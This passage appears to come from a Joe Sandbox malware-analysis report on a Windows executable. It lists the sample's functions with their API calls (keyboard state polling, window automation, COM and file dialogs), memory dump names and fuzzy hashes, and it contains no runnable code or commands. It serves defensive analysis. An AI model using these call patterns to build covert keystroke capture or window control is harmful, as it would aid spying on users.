                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                                        • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                        • API String ID: 2295938435-2354261254
                                                                                                        • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                                        • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                                                                        • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                                        • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                                                                        Function 004531B1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                                                        • String ID: %.15g$0x%p$False$True
                                                                                                        • API String ID: 3038501623-2263619337
                                                                                                        • Opcode ID: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                                                                                        • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                                                                        • Opcode Fuzzy Hash: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                                                                                        • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                                                                        Function 0045E538 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                        • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                                                        • __swprintf.LIBCMT ref: 0045E5F6
                                                                                                        • _wprintf.LIBCMT ref: 0045E6A3
                                                                                                        • _wprintf.LIBCMT ref: 0045E6C7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                                        • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                        • API String ID: 2295938435-8599901
                                                                                                        • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                                        • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                                                                        • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                                        • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                                                                        Function 00443B61 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99sleepwindowtimeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • timeGetTime.WINMM ref: 00443B67
                                                                                                          • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                                                                        • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                                                                        • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                                                                                                        • SetActiveWindow.USER32(?), ref: 00443BEC
                                                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                                                                        • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                                                                                                        • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                                                                        • IsWindow.USER32(?), ref: 00443C3A
                                                                                                        • EndDialog.USER32(?,00000000), ref: 00443C4C
                                                                                                          • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                          • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                          • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                        • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                                                        • String ID: BUTTON
                                                                                                        • API String ID: 1834419854-3405671355
                                                                                                        • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                        • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                                                                        • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                        • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                                                                        Function 00454014 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                                                        • LoadStringW.USER32(00000000), ref: 00454040
                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                        • _wprintf.LIBCMT ref: 00454074
                                                                                                        • __swprintf.LIBCMT ref: 004540A3
                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                        • API String ID: 455036304-4153970271
                                                                                                        • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                        • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                                                                        • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                        • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                                                                        Function 00467C8E Relevance: 18.3, APIs: 12, Instructions: 310COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                                                        • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                                                                        • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                                                        • _memmove.LIBCMT ref: 00467EB8
                                                                                                        • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                                                        • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                                                        • _memmove.LIBCMT ref: 00467F6C
                                                                                                        • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                                                        • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                        • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                        • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 2170234536-0
                                                                                                        • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                                                        • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                                                                        • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                                                        • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                                                                        Function 00453C57 Relevance: 18.2, APIs: 12, Instructions: 190keyboardCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                                                        • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                                                        • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                                                        • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                                                        • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                                                        • GetKeyState.USER32(00000012), ref: 00453E26
                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                                                        • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: State$Async$Keyboard
                                                                                                        • String ID:
                                                                                                        • API String ID: 541375521-0
                                                                                                        • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                        • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                                                                        • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                        • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                                                                        Function 004357B7 Relevance: 18.2, APIs: 12, Instructions: 184COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                                                        • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                                                        • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                                                        • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                                                        • String ID:
                                                                                                        • API String ID: 3096461208-0
                                                                                                        • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                                        • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                                                                        • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                                        • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                                                                        Function 004714D9 Relevance: 18.1, APIs: 12, Instructions: 132windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                                                                        • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                                                                        • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                                                                        • DeleteObject.GDI32(?), ref: 0047151E
                                                                                                        • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                                                                        • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                                                                        • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                                                                        • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                                                                        • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                                                                        • DeleteObject.GDI32(?), ref: 004715EA
                                                                                                        • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 3218148540-0
                                                                                                        • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                        • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                                                                        • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                        • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                                                                        Function 00433784 Relevance: 18.1, APIs: 12, Instructions: 119COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                        • String ID:
                                                                                                        • API String ID: 136442275-0
                                                                                                        • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                                        • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                                                                        • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                                        • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                                                                        Function 00467408 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 308COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _wcsncpy.LIBCMT ref: 00467490
                                                                                                        • _wcsncpy.LIBCMT ref: 004674BC
                                                                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                        • _wcstok.LIBCMT ref: 004674FF
                                                                                                          • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                                        • _wcstok.LIBCMT ref: 004675B2
                                                                                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                                        • _wcslen.LIBCMT ref: 00467793
                                                                                                        • _wcscpy.LIBCMT ref: 00467641
                                                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                        • _wcslen.LIBCMT ref: 004677BD
                                                                                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                          • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                                                        • String ID: X
                                                                                                        • API String ID: 3104067586-3081909835
                                                                                                        • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                                                                        • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                                                                        • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                                                                        • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                                                                        Function 0046CB5F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 304comCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                                                                        • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                                                                        • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                                                        • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                                                        • _wcslen.LIBCMT ref: 0046CDB0
                                                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                                                        • CoTaskMemFree.OLE32(?), ref: 0046CE42
